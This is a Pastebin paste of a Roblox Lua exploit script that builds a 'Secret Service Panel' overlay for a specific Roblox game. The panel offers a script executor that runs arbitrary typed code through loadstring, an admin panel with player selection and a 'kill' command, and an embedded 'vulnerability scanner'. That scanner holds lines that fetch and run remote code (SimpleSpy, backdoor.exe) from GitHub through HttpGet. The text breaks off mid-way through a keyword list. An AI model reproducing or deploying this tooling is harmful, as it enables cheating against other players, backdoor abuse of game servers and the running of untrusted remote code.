Josiahiscool73

secret service panel script roblox

May 16th, 2024
39
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 43.71 KB | None | 0 0
  1. --game
  2.  
  3. --https://web.roblox.com/games/3554069044/Live-Life-Rich-and-Famous-in-Paradise
  4.  
  5.  
  6.  
  7.  
  8.  
  9. --script
  10.  
  11.  
  12. local SecrectServicePanelFoldr = Instance.new("Folder",game:GetService("ReplicatedStorage"))
  13. SecrectServicePanelFoldr.Name = "SecrectServicePanel"
  14. local Player = Instance.new("StringValue",game:GetService("ReplicatedStorage"):WaitForChild("SecrectServicePanel"))
  15. Player.Name = "Player"
  16. Player.Value = game:GetService("Players").LocalPlayer.Name
  17.  
  18. removething = function(name,parent) for i,v in pairs(parent:GetChildren()) do if v.Name == name then v:Destroy() end end end
  19. removething("S3crectS4viceP1nel",game:GetService("CoreGui"))
  20.  
  21. local S3crectS4viceP1nel = Instance.new("ScreenGui")
  22. local Frame = Instance.new("Frame")
  23. local Packages = Instance.new("Frame")
  24. local ScrollingFrame = Instance.new("ScrollingFrame")
  25. local TextBox = Instance.new("TextBox")
  26. local zoom_out = Instance.new("ImageButton")
  27. local UIGridLayout = Instance.new("UIGridLayout")
  28. local Example = Instance.new("TextButton")
  29. local more_vert = Instance.new("ImageButton")
  30. local NameLabel = Instance.new("TextLabel")
  31. local TextButton = Instance.new("TextButton")
  32. local close = Instance.new("ImageButton")
  33. local remove = Instance.new("ImageButton")
  34. local Frame_2 = Instance.new("Frame")
  35. local arrow_drop_up = Instance.new("ImageButton")
  36. local arrow_drop_up_2 = Instance.new("ImageButton")
  37. local TextLabel = Instance.new("TextLabel")
  38. local navigate_next = Instance.new("ImageButton")
  39. local AdminPanel = Instance.new("Frame")
  40. local AdminFrame = Instance.new("Frame")
  41. local ScrollingFrame_2 = Instance.new("ScrollingFrame")
  42. local UIGridLayout_2 = Instance.new("UIGridLayout")
  43. local ExampleCMD = Instance.new("TextButton")
  44. local PlayersFrame = Instance.new("Frame")
  45. local ScrollingFrame_3 = Instance.new("ScrollingFrame")
  46. local UIGridLayout_3 = Instance.new("UIGridLayout")
  47. local ExamplePlrs = Instance.new("TextButton")
  48. local TextButton_2 = Instance.new("TextButton")
  49. local refresh = Instance.new("ImageButton")
  50. local Executor = Instance.new("Frame")
  51. local TextButton_3 = Instance.new("TextButton")
  52. local TextButton_4 = Instance.new("TextButton")
  53. local TextBox_2 = Instance.new("TextBox")
  54. local Frame_3 = Instance.new("Frame")
  55. local UIListLayout = Instance.new("UIListLayout")
  56. local Frame_4 = Instance.new("Frame")
  57. local packages = Instance.new("TextButton")
  58.  
  59. --Properties:
  60.  
  61. S3crectS4viceP1nel.Name = "S3crectS4viceP1nel"
  62. S3crectS4viceP1nel.Parent = game:GetService("CoreGui")
  63. S3crectS4viceP1nel.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  64. S3crectS4viceP1nel.ResetOnSpawn = false
  65.  
  66. Frame.Parent = S3crectS4viceP1nel
  67. Frame.BackgroundColor3 = Color3.fromRGB(59, 58, 59)
  68. Frame.BorderSizePixel = 0
  69. Frame.Position = UDim2.new(0.628370464, 0, 0.529925168, 0)
  70. Frame.Size = UDim2.new(0, 442, 0, 265)
  71.  
  72. Packages.Name = "Packages"
  73. Packages.Parent = Frame
  74. Packages.BackgroundColor3 = Color3.fromRGB(36, 35, 36)
  75. Packages.BorderSizePixel = 0
  76. Packages.Position = UDim2.new(0.211046755, 0, 0.150033444, 0)
  77. Packages.Size = UDim2.new(0, 334, 0, 197)
  78. Packages.Visible = false
  79.  
  80. ScrollingFrame.Parent = Packages
  81. ScrollingFrame.Active = true
  82. ScrollingFrame.BackgroundColor3 = Color3.fromRGB(38, 37, 38)
  83. ScrollingFrame.BorderSizePixel = 0
  84. ScrollingFrame.Position = UDim2.new(0.0269461069, 0, -3.09823122e-07, 0)
  85. ScrollingFrame.Size = UDim2.new(0, 338, 0, 195)
  86. ScrollingFrame.ScrollBarThickness = 0
  87.  
  88. TextBox.Parent = ScrollingFrame
  89. TextBox.BackgroundColor3 = Color3.fromRGB(47, 46, 49)
  90. TextBox.BorderSizePixel = 0
  91. TextBox.LayoutOrder = -999
  92. TextBox.Position = UDim2.new(-0.195084736, 0, -1.28571427, 0)
  93. TextBox.Size = UDim2.new(0, 324, 0, 18)
  94. TextBox.Font = Enum.Font.SourceSans
  95. TextBox.PlaceholderColor3 = Color3.fromRGB(178, 178, 178)
  96. TextBox.PlaceholderText = "Search"
  97. TextBox.Text = ""
  98. TextBox.TextColor3 = Color3.fromRGB(178, 178, 178)
  99. TextBox.TextSize = 14.000
  100. TextBox.TextXAlignment = Enum.TextXAlignment.Left
  101.  
  102. zoom_out.Name = "zoom_out"
  103. zoom_out.Parent = TextBox
  104. zoom_out.BackgroundTransparency = 1.000
  105. zoom_out.LayoutOrder = 7
  106. zoom_out.Position = UDim2.new(0.897297323, 0, 0.191768795, 0)
  107. zoom_out.Size = UDim2.new(0, 16, 0, 17)
  108. zoom_out.ZIndex = 2
  109. zoom_out.Image = "rbxassetid://3926307971"
  110. zoom_out.ImageColor3 = Color3.fromRGB(178, 178, 178)
  111. zoom_out.ImageRectOffset = Vector2.new(284, 164)
  112. zoom_out.ImageRectSize = Vector2.new(36, 36)
  113.  
  114. UIGridLayout.Parent = ScrollingFrame
  115. UIGridLayout.SortOrder = Enum.SortOrder.LayoutOrder
  116. UIGridLayout.CellPadding = UDim2.new(0, 0, 0, 0)
  117. UIGridLayout.CellSize = UDim2.new(0, 338, 0, 25)
  118.  
  119. Example.Name = "Example"
  120. Example.Parent = SecrectServicePanelFoldr
  121. Example.BackgroundColor3 = Color3.fromRGB(53, 52, 53)
  122. Example.BorderSizePixel = 0
  123. Example.Position = UDim2.new(0.00834664889, 0, 0.139153346, 0)
  124. Example.Size = UDim2.new(0, 338, 0, 25)
  125. Example.Font = Enum.Font.SourceSans
  126. Example.Text = "Example"
  127. Example.TextColor3 = Color3.fromRGB(255, 255, 255)
  128. Example.TextSize = 13.000
  129. Example.TextXAlignment = Enum.TextXAlignment.Left
  130.  
  131. more_vert.Name = "more_vert"
  132. more_vert.Parent = Example
  133. more_vert.BackgroundTransparency = 1.000
  134. more_vert.LayoutOrder = 9
  135. more_vert.Position = UDim2.new(0.917309701, 0, 0.128279269, 0)
  136. more_vert.Size = UDim2.new(0, 16, 0, 17)
  137. more_vert.ZIndex = 2
  138. more_vert.Image = "rbxassetid://3926305904"
  139. more_vert.ImageRectOffset = Vector2.new(764, 764)
  140. more_vert.ImageRectSize = Vector2.new(36, 36)
  141.  
  142. NameLabel.Name = "NameLabel"
  143. NameLabel.Parent = Frame
  144. NameLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  145. NameLabel.BackgroundTransparency = 1.000
  146. NameLabel.Size = UDim2.new(0, 121, 0, 15)
  147. NameLabel.Font = Enum.Font.SourceSans
  148. NameLabel.Text = " Secret Serivce Panel"
  149. NameLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  150. NameLabel.TextSize = 14.000
  151. NameLabel.TextWrapped = true
  152. NameLabel.TextXAlignment = Enum.TextXAlignment.Left
  153.  
  154. TextButton.Parent = Frame
  155. TextButton.BackgroundColor3 = Color3.fromRGB(53, 52, 53)
  156. TextButton.BorderSizePixel = 0
  157. TextButton.Position = UDim2.new(0.002358553, 0, 0.0630111992, 0)
  158. TextButton.Size = UDim2.new(0, 213, 0, 22)
  159. TextButton.Font = Enum.Font.SourceSans
  160. TextButton.Text = "Executor"
  161. TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  162. TextButton.TextSize = 14.000
  163.  
  164. close.Name = "close"
  165. close.Parent = Frame
  166. close.BackgroundTransparency = 1.000
  167. close.Position = UDim2.new(0.955525577, 0, -0.00276563875, 0)
  168. close.Size = UDim2.new(0, 16, 0, 17)
  169. close.ZIndex = 2
  170. close.Image = "rbxassetid://3926305904"
  171. close.ImageRectOffset = Vector2.new(284, 4)
  172. close.ImageRectSize = Vector2.new(24, 24)
  173.  
  174. remove.Name = "remove"
  175. remove.Parent = Frame
  176. remove.BackgroundTransparency = 1.000
  177. remove.LayoutOrder = 6
  178. remove.Position = UDim2.new(0.912398934, 0, -0.00218338333, 0)
  179. remove.Size = UDim2.new(0, 16, 0, 17)
  180. remove.ZIndex = 2
  181. remove.Image = "rbxassetid://3926307971"
  182. remove.ImageRectOffset = Vector2.new(884, 284)
  183. remove.ImageRectSize = Vector2.new(36, 36)
  184.  
  185. Frame_2.Parent = Frame
  186. Frame_2.BackgroundColor3 = Color3.fromRGB(48, 46, 49)
  187. Frame_2.BorderSizePixel = 0
  188. Frame_2.Position = UDim2.new(0.961906016, 0, 0.148312107, 0)
  189. Frame_2.Size = UDim2.new(0, 16, 0, 196)
  190.  
  191. arrow_drop_up.Name = "arrow_drop_up"
  192. arrow_drop_up.Parent = Frame_2
  193. arrow_drop_up.BackgroundTransparency = 1.000
  194. arrow_drop_up.LayoutOrder = 8
  195. arrow_drop_up.Position = UDim2.new(0, 0, 0.00291936332, 0)
  196. arrow_drop_up.Size = UDim2.new(0, 16, 0, 17)
  197. arrow_drop_up.ZIndex = 2
  198. arrow_drop_up.Image = "rbxassetid://3926307971"
  199. arrow_drop_up.ImageRectOffset = Vector2.new(164, 484)
  200. arrow_drop_up.ImageRectSize = Vector2.new(36, 36)
  201.  
  202. arrow_drop_up_2.Name = "arrow_drop_up"
  203. arrow_drop_up_2.Parent = Frame_2
  204. arrow_drop_up_2.BackgroundTransparency = 1.000
  205. arrow_drop_up_2.LayoutOrder = 8
  206. arrow_drop_up_2.Position = UDim2.new(0, 0, 0.918412328, 0)
  207. arrow_drop_up_2.Rotation = 180.000
  208. arrow_drop_up_2.Size = UDim2.new(0, 16, 0, 17)
  209. arrow_drop_up_2.ZIndex = 2
  210. arrow_drop_up_2.Image = "rbxassetid://3926307971"
  211. arrow_drop_up_2.ImageRectOffset = Vector2.new(164, 484)
  212. arrow_drop_up_2.ImageRectSize = Vector2.new(36, 36)
  213.  
  214. TextLabel.Parent = Frame
  215. TextLabel.BackgroundColor3 = Color3.fromRGB(56, 55, 58)
  216. TextLabel.BorderSizePixel = 0
  217. TextLabel.Position = UDim2.new(0.0520361997, 0, 0.905660391, 0)
  218. TextLabel.Size = UDim2.new(0, 415, 0, 18)
  219. TextLabel.Font = Enum.Font.SourceSans
  220. TextLabel.LineHeight = 1.170
  221. TextLabel.Text = "Click or press ; to enter a command."
  222. TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  223. TextLabel.TextSize = 13.000
  224. TextLabel.TextXAlignment = Enum.TextXAlignment.Left
  225.  
  226. navigate_next.Name = "navigate_next"
  227. navigate_next.Parent = TextLabel
  228. navigate_next.BackgroundTransparency = 1.000
  229. navigate_next.LayoutOrder = 13
  230. navigate_next.Position = UDim2.new(-0.0570844896, 0, 0.0119052464, 0)
  231. navigate_next.Size = UDim2.new(0, 24, 0, 17)
  232. navigate_next.ZIndex = 2
  233. navigate_next.Image = "rbxassetid://3926305904"
  234. navigate_next.ImageRectOffset = Vector2.new(444, 844)
  235. navigate_next.ImageRectSize = Vector2.new(36, 36)
  236.  
  237. AdminPanel.Name = "AdminPanel"
  238. AdminPanel.Parent = Frame
  239. AdminPanel.BackgroundColor3 = Color3.fromRGB(36, 35, 36)
  240. AdminPanel.BorderSizePixel = 0
  241. AdminPanel.Position = UDim2.new(0.211046755, 0, 0.150033444, 0)
  242. AdminPanel.Size = UDim2.new(0, 334, 0, 197)
  243. AdminPanel.Visible = false
  244.  
  245. AdminFrame.Name = "AdminFrame"
  246. AdminFrame.Parent = AdminPanel
  247. AdminFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  248. AdminFrame.BackgroundTransparency = 1.000
  249. AdminFrame.Position = UDim2.new(0.0179640725, 0, 0.0507614203, 0)
  250. AdminFrame.Size = UDim2.new(0, 209, 0, 184)
  251.  
  252. ScrollingFrame_2.Parent = AdminFrame
  253. ScrollingFrame_2.Active = true
  254. ScrollingFrame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  255. ScrollingFrame_2.BackgroundTransparency = 1.000
  256. ScrollingFrame_2.BorderSizePixel = 0
  257. ScrollingFrame_2.Size = UDim2.new(0, 208, 0, 184)
  258. ScrollingFrame_2.BottomImage = ""
  259. ScrollingFrame_2.MidImage = ""
  260. ScrollingFrame_2.TopImage = ""
  261.  
  262. UIGridLayout_2.Parent = ScrollingFrame_2
  263. UIGridLayout_2.SortOrder = Enum.SortOrder.LayoutOrder
  264. UIGridLayout_2.CellSize = UDim2.new(0, 100, 0, 30)
  265. UIGridLayout_2.StartCorner = Enum.StartCorner.BottomLeft
  266.  
  267. ExampleCMD.Name = "ExampleCMD"
  268. ExampleCMD.Parent = SecrectServicePanelFoldr
  269. ExampleCMD.BackgroundColor3 = Color3.fromRGB(53, 52, 53)
  270. ExampleCMD.BorderSizePixel = 0
  271. ExampleCMD.Position = UDim2.new(0.00834664889, 0, 0.0630109012, 0)
  272. ExampleCMD.Size = UDim2.new(0, 82, 0, 26)
  273. ExampleCMD.Font = Enum.Font.SourceSans
  274. ExampleCMD.Text = "Example"
  275. ExampleCMD.TextColor3 = Color3.fromRGB(255, 255, 255)
  276. ExampleCMD.TextSize = 13.000
  277. ExampleCMD.TextXAlignment = Enum.TextXAlignment.Left
  278.  
  279. PlayersFrame.Name = "PlayersFrame"
  280. PlayersFrame.Parent = AdminPanel
  281. PlayersFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  282. PlayersFrame.BackgroundTransparency = 1.000
  283. PlayersFrame.Position = UDim2.new(0.646706581, 0, 0.0558375642, 0)
  284. PlayersFrame.Size = UDim2.new(0, 112, 0, 184)
  285.  
  286. ScrollingFrame_3.Parent = PlayersFrame
  287. ScrollingFrame_3.Active = true
  288. ScrollingFrame_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  289. ScrollingFrame_3.BackgroundTransparency = 1.000
  290. ScrollingFrame_3.BorderColor3 = Color3.fromRGB(36, 35, 36)
  291. ScrollingFrame_3.BorderSizePixel = 2
  292. ScrollingFrame_3.Size = UDim2.new(0, 113, 0, 184)
  293. ScrollingFrame_3.BottomImage = ""
  294. ScrollingFrame_3.CanvasSize = UDim2.new(0, 0, 15, 0)
  295. ScrollingFrame_3.ScrollBarThickness = 1
  296. ScrollingFrame_3.TopImage = ""
  297.  
  298. UIGridLayout_3.Parent = ScrollingFrame_3
  299. UIGridLayout_3.SortOrder = Enum.SortOrder.LayoutOrder
  300. UIGridLayout_3.CellSize = UDim2.new(0, 120, 0, 30)
  301. UIGridLayout_3.StartCorner = Enum.StartCorner.BottomLeft
  302.  
  303. ExamplePlrs.Name = "ExamplePlrs"
  304. ExamplePlrs.Parent = ScrollingFrame_3
  305. ExamplePlrs.BackgroundColor3 = Color3.fromRGB(66, 64, 66)
  306. ExamplePlrs.BackgroundTransparency = 0.700
  307. ExamplePlrs.BorderSizePixel = 0
  308. ExamplePlrs.Size = UDim2.new(0, 200, 0, 50)
  309. ExamplePlrs.Visible = false
  310. ExamplePlrs.Font = Enum.Font.SourceSans
  311. ExamplePlrs.Text = "pipeman"
  312. ExamplePlrs.TextColor3 = Color3.fromRGB(255, 255, 255)
  313. ExamplePlrs.TextSize = 14.000
  314.  
  315. TextButton_2.Parent = Frame
  316. TextButton_2.BackgroundColor3 = Color3.fromRGB(53, 52, 53)
  317. TextButton_2.BorderSizePixel = 0
  318. TextButton_2.Position = UDim2.new(0.47963801, 0, 0.0641509444, 0)
  319. TextButton_2.Size = UDim2.new(0, 206, 0, 22)
  320. TextButton_2.Font = Enum.Font.SourceSans
  321. TextButton_2.Text = "Admin Panel"
  322. TextButton_2.TextColor3 = Color3.fromRGB(255, 255, 255)
  323. TextButton_2.TextSize = 14.000
  324.  
  325. refresh.Name = "refresh"
  326. refresh.Parent = Frame
  327. refresh.BackgroundTransparency = 1.000
  328. refresh.Position = UDim2.new(0.959718883, 0, 0.0717624426, 0)
  329. refresh.Size = UDim2.new(0, 16, 0, 17)
  330. refresh.ZIndex = 2
  331. refresh.Image = "rbxassetid://3926307971"
  332. refresh.ImageRectOffset = Vector2.new(404, 84)
  333. refresh.ImageRectSize = Vector2.new(36, 36)
  334.  
  335. Executor.Name = "Executor"
  336. Executor.Parent = Frame
  337. Executor.BackgroundColor3 = Color3.fromRGB(36, 35, 36)
  338. Executor.BorderSizePixel = 0
  339. Executor.Position = UDim2.new(0.206224695, 0, 0.153291643, 0)
  340. Executor.Size = UDim2.new(0, 334, 0, 195)
  341. Executor.ZIndex = 20
  342.  
  343. TextButton_3.Parent = Executor
  344. TextButton_3.BackgroundColor3 = Color3.fromRGB(53, 52, 53)
  345. TextButton_3.BorderSizePixel = 0
  346. TextButton_3.Position = UDim2.new(0.00342089264, 0, 0.8696419, 0)
  347. TextButton_3.Size = UDim2.new(0, 168, 0, 23)
  348. TextButton_3.Font = Enum.Font.SourceSans
  349. TextButton_3.Text = "Execute"
  350. TextButton_3.TextColor3 = Color3.fromRGB(255, 255, 255)
  351. TextButton_3.TextSize = 14.000
  352.  
  353. TextButton_4.Parent = Executor
  354. TextButton_4.BackgroundColor3 = Color3.fromRGB(53, 52, 53)
  355. TextButton_4.BorderSizePixel = 0
  356. TextButton_4.Position = UDim2.new(0.503420889, 0, 0.869642198, 0)
  357. TextButton_4.Size = UDim2.new(0, 157, 0, 23)
  358. TextButton_4.Font = Enum.Font.SourceSans
  359. TextButton_4.Text = "Clear"
  360. TextButton_4.TextColor3 = Color3.fromRGB(255, 255, 255)
  361. TextButton_4.TextSize = 14.000
  362.  
  363. TextBox_2.Parent = Executor
  364. TextBox_2.BackgroundColor3 = Color3.fromRGB(50, 49, 50)
  365. TextBox_2.BorderSizePixel = 0
  366. TextBox_2.Position = UDim2.new(0.00299401209, 0, -0.00507614203, 0)
  367. TextBox_2.Size = UDim2.new(0, 324, 0, 170)
  368. TextBox_2.Font = Enum.Font.SourceSans
  369. TextBox_2.MultiLine = true
  370. TextBox_2.ClearTextOnFocus = false
  371. TextBox_2.Text = ""
  372. TextBox_2.TextColor3 = Color3.fromRGB(255, 255, 255)
  373. TextBox_2.TextSize = 14.000
  374. TextBox_2.TextXAlignment = Enum.TextXAlignment.Left
  375. TextBox_2.TextYAlignment = Enum.TextYAlignment.Top
  376.  
  377. Frame_3.Parent = Executor
  378. Frame_3.BackgroundColor3 = Color3.fromRGB(50, 49, 50)
  379. Frame_3.BorderSizePixel = 0
  380. Frame_3.Size = UDim2.new(0, 14, 0, 171)
  381. Frame_3.Visible = false
  382.  
  383. UIListLayout.Parent = Frame_3
  384. UIListLayout.SortOrder = Enum.SortOrder.LayoutOrder
  385.  
  386. Frame_4.Parent = Frame
  387. Frame_4.BackgroundColor3 = Color3.fromRGB(56, 56, 56)
  388. Frame_4.BorderSizePixel = 0
  389. Frame_4.Position = UDim2.new(-0.000358005753, 0, 0.152203158, 0)
  390. Frame_4.Size = UDim2.new(0, 92, 0, 197)
  391.  
  392. packages.Name = "packages"
  393. packages.Parent = Frame
  394. packages.BackgroundColor3 = Color3.fromRGB(70, 69, 70)
  395. packages.BorderSizePixel = 0
  396. packages.Position = UDim2.new(0.00517658424, 0, 0.178197145, 0)
  397. packages.Size = UDim2.new(0, 88,0, 28)
  398. packages.Font = Enum.Font.SourceSans
  399. packages.Text = "Packages"
  400. packages.TextColor3 = Color3.fromRGB(255, 255, 255)
  401. packages.TextSize = 18.000
  402. packages.TextWrapped = true
  403.  
  404. -- Scripts:
  405.  
  406. local function KNZX_fake_script() -- TextBox.LocalScript
  407. local script = Instance.new('LocalScript', TextBox)
  408.  
  409. local searchBar = script.Parent
  410. local scrolllFrame = script.Parent.Parent
  411.  
  412. function updateSearch()
  413. for i,button in pairs(scrolllFrame:GetChildren()) do
  414. if button:IsA("TextButton") then
  415. local searchText = string.lower(searchBar.Text)
  416. if searchText ~= "" then
  417. local buttonText = string.lower(button.Text)
  418. if string.find(buttonText, searchText) then
  419. button.Visible = true
  420. else
  421. button.Visible = false
  422. end
  423. else
  424. button.Visible = true
  425. end
  426. end
  427. end
  428. end
  429.  
  430. searchBar:GetPropertyChangedSignal("Text"):Connect(updateSearch)
  431. end
  432. coroutine.wrap(KNZX_fake_script)()
  433. local function SGMWI_fake_script() -- TextButton.LocalScript
  434. local script = Instance.new('LocalScript', TextButton)
  435.  
  436. script.Parent.MouseButton1Click:Connect(function()
  437. script.Parent.Parent.AdminPanel.Visible = false
  438. script.Parent.Parent.Packages.Visible = false
  439. script.Parent.Parent.Executor.Visible = true
  440. end)
  441. end
  442. coroutine.wrap(SGMWI_fake_script)()
  443. local function SXSMBHB_fake_script() -- close.LocalScript
  444. local script = Instance.new('LocalScript', close)
  445.  
  446. script.Parent.MouseButton1Click:Connect(function()
  447. script.Parent.Parent.Parent:Destroy()
  448. end)
  449. end
  450. coroutine.wrap(SXSMBHB_fake_script)()
  451. local function AQRU_fake_script() -- remove.LocalScript
  452. local script = Instance.new('LocalScript', remove)
  453.  
  454. script.Parent.MouseButton1Click:Connect(function()
  455. if script.Parent.Parent.refresh.Visible == true then
  456. for i,v in pairs(script.Parent.Parent:GetChildren()) do
  457. if v.Name == "remove" or v.Name == "close" or v.Name == "NameLabel" then
  458. script.Parent.Parent.Size = UDim2.new(0, 442, 0, 16)
  459. else
  460. if v.ClassName ~= "LocalScript" then
  461. v.Visible = false
  462. end
  463. end
  464. end
  465. else
  466. for i,v in pairs(script.Parent.Parent:GetChildren()) do
  467. if v.Name == "remove" or v.Name == "close" or v.Name == "NameLabel" then
  468. script.Parent.Parent.Size = UDim2.new(0, 442, 0, 265)
  469. else
  470. if v.ClassName ~= "LocalScript" then
  471. v.Visible = true
  472. end
  473. end
  474. end
  475. end
  476. end)
  477. end
  478. coroutine.wrap(AQRU_fake_script)()
  479. local function ZOMFSSU_fake_script() -- Frame.Dragify
  480. local script = Instance.new('LocalScript', Frame)
  481.  
  482. local UIS = game:GetService("UserInputService")
  483. function dragify(Frame)
  484. dragToggle = nil
  485. local dragSpeed = 0.50
  486. dragInput = nil
  487. dragStart = nil
  488. local dragPos = nil
  489. function updateInput(input)
  490. local Delta = input.Position - dragStart
  491. local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
  492. game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.30), {Position = Position}):Play()
  493. end
  494. Frame.InputBegan:Connect(function(input)
  495. if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
  496. dragToggle = true
  497. dragStart = input.Position
  498. startPos = Frame.Position
  499. input.Changed:Connect(function()
  500. if input.UserInputState == Enum.UserInputState.End then
  501. dragToggle = false
  502. end
  503. end)
  504. end
  505. end)
  506. Frame.InputChanged:Connect(function(input)
  507. if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
  508. dragInput = input
  509. end
  510. end)
  511. game:GetService("UserInputService").InputChanged:Connect(function(input)
  512. if input == dragInput and dragToggle then
  513. updateInput(input)
  514. end
  515. end)
  516. end
  517.  
  518. dragify(script.Parent)
  519. end
  520. coroutine.wrap(ZOMFSSU_fake_script)()
  521. local function FLYT_fake_script() -- ExampleCMD.LocalScript
  522. local script = Instance.new('LocalScript', ExampleCMD)
  523.  
  524. script.Parent.MouseButton1Click:Connect(function()
  525. --size changer
  526. end)
  527. end
  528. coroutine.wrap(FLYT_fake_script)()
  529. local function GKOVJ_fake_script() -- ScrollingFrame_3.LocalScript
  530. local script = Instance.new('LocalScript', ScrollingFrame_3)
  531.  
  532. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  533. if v:IsA("Player") then
  534. --local NewPlayer = Instance.new("TextButton",script.Parent)
  535. --NewPlayer.Active = true
  536. --NewPlayer.AutoButtonColor = true
  537. --NewPlayer.BackgroundColor3 = Color3.new(66,64,66)
  538. --NewPlayer.BackgroundTransparency = 0.7
  539. --NewPlayer.BorderSizePixel = 0
  540. --NewPlayer.Name = v.Name
  541. --NewPlayer.Visible = true
  542. --NewPlayer.Text = v.Name
  543. --NewPlayer.TextColor3 = Color3.new(255,255,255)
  544. --NewPlayer.TextScaled = true
  545. --NewPlayer.TextWrapped = true
  546. local NewPlayer = script.Parent.ExamplePlrs:Clone()
  547. NewPlayer.Name = v.Name
  548. NewPlayer.Text = v.Name
  549. NewPlayer.Parent = script.Parent
  550. NewPlayer.Visible = true
  551. NewPlayer.MouseButton1Click:Connect(function()
  552. Player.Value = NewPlayer.Text
  553. end)
  554. end
  555. end
  556. end
  557. coroutine.wrap(GKOVJ_fake_script)()
  558. local function EHNJJIG_fake_script() -- TextButton_2.LocalScript
  559. local script = Instance.new('LocalScript', TextButton_2)
  560.  
  561. script.Parent.MouseButton1Click:Connect(function()
  562. script.Parent.Parent.AdminPanel.Visible = true
  563. script.Parent.Parent.Packages.Visible = false
  564. script.Parent.Parent.Executor.Visible = false
  565. end)
  566. end
  567. coroutine.wrap(EHNJJIG_fake_script)()
  568. local function QRUYCIJ_fake_script() -- refresh.LocalScript
  569. local script = Instance.new('LocalScript', refresh)
  570.  
  571. script.Parent.MouseButton1Click:Connect(function()
  572. for i,v in pairs(script.Parent.Parent.AdminPanel.PlayersFrame:GetChildren()) do
  573. if v:IsA("TextButton") then
  574. if v.Name == "ExamplePlrs" then
  575. -- none
  576. else
  577. v:Destroy()
  578. end
  579. end
  580. end
  581.  
  582. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  583. if v:IsA("Player") then
  584. --local NewPlayer = Instance.new("TextButton",script.Parent)
  585. --NewPlayer.Active = true
  586. --NewPlayer.AutoButtonColor = true
  587. --NewPlayer.BackgroundColor3 = Color3.new(66,64,66)
  588. --NewPlayer.BackgroundTransparency = 0.7
  589. --NewPlayer.BorderSizePixel = 0
  590. --NewPlayer.Name = v.Name
  591. --NewPlayer.Visible = true
  592. --NewPlayer.Text = v.Name
  593. --NewPlayer.TextColor3 = Color3.new(255,255,255)
  594. --NewPlayer.TextScaled = true
  595. --NewPlayer.TextWrapped = true
  596. local NewPlayer = ExamplePlrs:Clone()
  597. NewPlayer.Name = v.Name
  598. NewPlayer.Text = v.Name
  599. NewPlayer.Parent = PlayersFrame.ScrollingFrame
  600. NewPlayer.Visible = true
  601. NewPlayer.MouseButton1Click:Connect(function()
  602. Player.Value = NewPlayer.Text
  603. end)
  604. end
  605. end
  606. end)
  607. end
  608. coroutine.wrap(QRUYCIJ_fake_script)()
  609. local function SHGQSS_fake_script() -- TextButton_3.LocalScript
  610. local script = Instance.new('LocalScript', TextButton_3)
  611.  
  612. script.Parent.MouseButton1Click:Connect(function()
  613. loadstring(script.Parent.Parent.TextBox.Text)()
  614. end)
  615. end
  616. coroutine.wrap(SHGQSS_fake_script)()
  617. local function LOFLOFC_fake_script() -- TextButton_4.LocalScript
  618. local script = Instance.new('LocalScript', TextButton_4)
  619.  
  620. script.Parent.MouseButton1Click:Connect(function()
  621. script.Parent.Parent.TextBox.Text = " "
  622. end)
  623. end
  624. coroutine.wrap(LOFLOFC_fake_script)()
  625. local function VQHBXP_fake_script() -- TextBox_2.LocalScript
  626. local script = Instance.new('LocalScript', TextBox_2)
  627.  
  628. --local t1, count = script.Parent.Text:gsub("\n", "")
  629.  
  630. --for i = 0, count, 1 do
  631. -- local CurrentLine = Instance.new("TextBox",script.Parent.Parent.Frame)
  632. -- CurrentLine.BackgroundTransparency = 1
  633. -- CurrentLine.BorderSizePixel = 0
  634. -- CurrentLine.LayoutOrder = 0
  635. -- CurrentLine.Name = count
  636. -- CurrentLine.Size = UDim2.new(0, 16, 0, 12)
  637. -- CurrentLine.ZIndex = 100
  638. -- CurrentLine.TextColor3 = Color3.new(255,255,255)
  639. -- CurrentLine.TextScaled = true
  640. -- CurrentLine.TextWrapped = true
  641. -- CurrentLine.Text = count
  642. -- wait(1)
  643. --end
  644. end
  645. coroutine.wrap(VQHBXP_fake_script)()
  646. local function IRDU_fake_script() -- packages.LocalScript
  647. local script = Instance.new('LocalScript', packages)
  648.  
  649. script.Parent.MouseButton1Click:Connect(function()
  650. script.Parent.Parent.AdminPanel.Visible = false
  651. script.Parent.Parent.Packages.Visible = true
  652. script.Parent.Parent.Executor.Visible = false
  653. end)
  654. end
  655. coroutine.wrap(IRDU_fake_script)()
  656. local function CreateCMD(name,callback)
  657. local NewCMD = ExampleCMD:Clone()
  658. NewCMD.Name = name
  659. NewCMD.Text = name
  660. NewCMD.Parent = ScrollingFrame_2
  661. NewCMD.MouseButton1Click:Connect(callback)
  662. end
  663. local function CreateScript(name,callback)
  664. local NewPackage = Example:Clone()
  665. NewPackage.Name = name
  666. NewPackage.Text = name
  667. NewPackage.Parent = ScrollingFrame
  668. NewPackage.MouseButton1Click:Connect(callback)
  669. end
  670.  
  671. CreateCMD("kill",function()
  672. --[[
  673. Simple vulnerability scanner v1.1
  674. Made by 0fiiz#7952
  675. ]]--
  676.  
  677.  
  678. local load_BackdoorEXE = false
  679. local load_SimplySpy = false
  680. local load_DestroyToolTest = false
  681.  
  682. if load_SimplySpy == true then
  683. loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))()
  684. end
  685.  
  686. if load_BackdoorEXE == true then
  687. loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))()
  688. end
  689.  
  690. local PingWords = {
  691. "destroy",
  692. "delete",
  693. "del",
  694. "place",
  695. "remove",
  696. "replicate",
  697. "loadstring",
  698. "rev",
  699. "admin",
